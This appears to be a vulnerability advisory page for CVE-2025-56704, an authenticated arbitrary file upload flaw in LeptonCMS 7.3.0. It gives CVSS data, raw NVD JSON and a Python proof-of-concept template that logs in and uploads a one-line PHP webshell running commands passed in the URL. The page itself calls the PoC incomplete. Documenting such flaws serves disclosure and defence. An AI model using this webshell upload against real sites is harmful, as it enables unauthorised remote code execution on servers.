Security Vulnerability Report
CVE-2025-56704 CVSS 8.8 HIGH

CVE-2025-56704

Published: 2025-12-09 17:15:51
Last Modified: 2025-12-11 20:16:09

Description

LeptonCMS version 7.3.0 contains an arbitrary file upload vulnerability, which is caused by the lack of proper validation for uploaded files. An authenticated attacker can exploit this vulnerability by uploading a specially crafted ZIP/PHP file to execute arbitrary code.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lepton-cms:leptoncms:7.3.0:*:*:*:*:*:*:* - VULNERABLE
LeptonCMS 7.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that it is a template rather than a working exploit: the upload endpoint (`UPLOAD_URL` ends in `...`), the multipart field name, and the format of the upload response are not given on this page and must be taken from the referenced advisory PDFs. The CVE description also mentions a crafted ZIP vector, which this PoC does not exercise.
python
# CVE-2025-56704 PoC - LeptonCMS 7.3.0 Arbitrary File Upload # Author: Security Researcher # Note: For authorized security testing only import requests import sys TARGET_URL = "http://target-website.com/lepton/admin/login/index.php" UPLOAD_URL = "http://target-website.com/lepton/admin/..." # Upload endpoint USERNAME = "attacker_account" PASSWORD = "attacker_password" def login(session): """Authenticate to LeptonCMS admin panel""" login_data = { 'username': USERNAME, 'password': PASSWORD } response = session.post(TARGET_URL, data=login_data) return 'login_success' in response.text or response.status_code == 200 def upload_malicious_file(session): """Upload malicious PHP file to achieve RCE""" # Create malicious PHP webshell php_shell = b'<?php system($_GET["cmd"]); ?>' files = { 'file': ('shell.php', php_shell, 'application/x-php') } response = session.post(UPLOAD_URL, files=files) return response def main(): session = requests.Session() print("[*] Step 1: Authenticating to LeptonCMS...") if not login(session): print("[-] Authentication failed") sys.exit(1) print("[+] Authentication successful") print("[*] Step 2: Uploading malicious PHP file...") response = upload_malicious_file(session) if response.status_code == 200: print("[+] File uploaded successfully") print("[*] Step 3: Execute commands via uploaded webshell") shell_url = response.json().get('file_path') print(f"[+] Shell accessible at: {shell_url}?cmd=whoami") else: print("[-] Upload failed") if __name__ == "__main__": main()

References (listed under `references` in the raw JSON below: three third-party advisory PDFs tagged "Exploit", plus a vendor link tagged "Not Applicable")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56704", "sourceIdentifier": "[email protected]", "published": "2025-12-09T17:15:51.373", "lastModified": "2025-12-11T20:16:08.923", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "LeptonCMS version 7.3.0 contains an arbitrary file upload vulnerability, which is caused by the lack of proper validation for uploaded files. An authenticated attacker can exploit this vulnerability by uploading a specially crafted ZIP/PHP file to execute arbitrary code."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lepton-cms:leptoncms:7.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "9BA1D316-152A-42DB-8A18-AC8392401C60"}]}]}], "references": [{"url": 
"http://lepton.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_A.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_B.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Kayi626/Vulns/blob/UserAccount/LEPTON_CMS_7.3.0_File_Upload_C.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}